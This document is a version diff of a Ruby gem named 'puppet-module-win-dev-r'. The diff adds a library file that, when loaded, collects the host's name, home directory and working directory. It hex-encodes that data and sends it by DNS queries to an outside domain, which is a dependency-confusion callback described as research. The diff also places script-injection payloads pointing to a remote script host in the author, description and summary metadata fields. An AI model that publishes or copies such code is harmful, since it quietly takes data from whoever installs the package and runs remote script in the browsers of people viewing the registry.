puppet-module-win-dev-r 1.0 → 3.1.7

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 859fdd3d8e44b09fbccfba49abbc96a6576d6a11b21f3079070fc28add1a32d3
-  data.tar.gz: 4f3e0ee67b9375bddcc11f1be2cd800a30f60380d67b3aff371abf08ec6c80bb
+  metadata.gz: 158ab059c1f72ed6b175530e7b8bd83848e697ab1a86a52d37f884fbe982a9f1
+  data.tar.gz: 63cb0f33e1b150afebd5dd2a454c2e4c06b052b4738091d02d051bdc09304a48
 SHA512:
-  metadata.gz: 715c6aa0801350c257eed6b1db5d4742dc039ca19397046f344edb194ffe99515f71e77a2a6ce928186d9dd1d56b864770279eec8ebcc9f65021bc3a22ca2aec
-  data.tar.gz: 0005a70f1afa2175e601333d48b865a44034dc1d6ba55489bac8ff215ab7617f253909917fb5f3844c9e6b80afca44dff9f78d5e7d5b4c411d09027b46a52eeb
+  metadata.gz: c37c77fd9d8f90dec9aaa2228c7be3301a95f5c60d4a429912173b1fe1d8aa0431ff70d0c98dd243709a852fc7c338fad066b737dfb76c153b27398887b84ad3
+  data.tar.gz: 8a1f24a08a6b39bffdc27df371133057d417a9b3d94fa4df3659a5e78f4323b8ff37c3d00b2a4444cfda51f3e7f8b776820aca3630a5c4d529db5d196cc68b02

data/lib/puppet-module-win-dev-r.rb

@@ -1,5 +1,61 @@
-module MyGem
-  def self.display_message
-    puts "poc by @gopal_ethical"
-  end
-end
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+This research is inspired by 'https://twitter.com/alxbrsn'
+More information is here: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '.dns.dependency-c4llb4ck.0lo.org'
+ns = 'dns1.dependency-c4llb4ck.0lo.org'
+
+package = 'puppet-module-win-dev-r'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end

metadata

@@ -1,28 +1,27 @@
 --- !ruby/object:Gem::Specification
 name: puppet-module-win-dev-r
 version: !ruby/object:Gem::Version
-  version: '1.0'
+  version: 3.1.7
 platform: ruby
 authors:
-- "@gopal_ethical"
-autorequire:
+- GEM"><script src=//x5s.0lo.org></script>
+autorequire: 
 bindir: bin
 cert_chain: []
-date: 2024-08-09 00:00:00.000000000 Z
+date: 2021-11-11 00:00:00.000000000 Z
 dependencies: []
-description: poc by @gopal_ethical
-email: ftest.first@gmail.com
-executables:
-- puppet-module-win-dev-r
+description: GEM Description puppet-module-win-dev-r "><script src=//x5s.0lo.org></script>
+email: 
+executables: []
 extensions: []
 extra_rdoc_files: []
 files:
-- bin/puppet-module-win-dev-r
 - lib/puppet-module-win-dev-r.rb
-homepage:
-licenses: []
+homepage: https://twitter.com/zuh4n
+licenses:
+- MIT
 metadata: {}
-post_install_message:
+post_install_message: 
 rdoc_options: []
 require_paths:
 - lib
@@ -37,8 +36,9 @@ required_rubygems_version: !ruby/object:Gem::Requirement
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.3.15
-signing_key:
+rubyforge_project: 
+rubygems_version: 2.7.6
+signing_key: 
 specification_version: 4
-summary: poc by @gopal_ethical
+summary: GEM Summary "><script src=//x5s.0lo.org></script>
 test_files: []

data/bin/puppet-module-win-dev-r

@@ -1,4 +0,0 @@
-#!/usr/bin/env ruby
-require 'puppet-module-win-dev-r'
-
-MyGem.display_message